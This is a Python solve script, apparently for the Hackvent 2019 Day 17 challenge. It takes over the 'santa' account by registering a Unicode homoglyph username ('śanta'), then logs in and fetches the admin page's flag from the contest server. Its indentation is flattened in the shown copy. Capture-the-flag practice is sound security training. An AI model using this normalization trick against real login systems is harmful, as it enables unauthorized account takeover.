Hackvent_2019/Day 17/exploit.py

34 lines
1.1 KiB
Python

#!/usr/bin/python
import requests
import random
import string
import re
BASE_URL = "http://whale.hacking-lab.com:8881"
PASSWORD = ''.join([random.choice(string.ascii_lowercase) for i in range(8)])
SESSION = requests.session()
FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
# 1. register user santa
res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
if res.status_code != 200 or "Registration successful!" not in res.text:
print("Server returned: %d %s" % (res.status_code, res.reason))
print(res.text)
exit(1)
# 2. login
res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
if res.status_code != 200 or "username not found or wrong password!" in res.text:
print("Server returned: %d %s" % (res.status_code, res.reason))
print(res.text)
exit(1)
# 3. get flag
res = SESSION.get(BASE_URL + "/admin.php")
if res.status_code != 200 or "username not found or wrong password!" in res.text:
print("Server returned: %d %s" % (res.status_code, res.reason))
exit(1)
print(FLAG_PATTERN.search(res.text))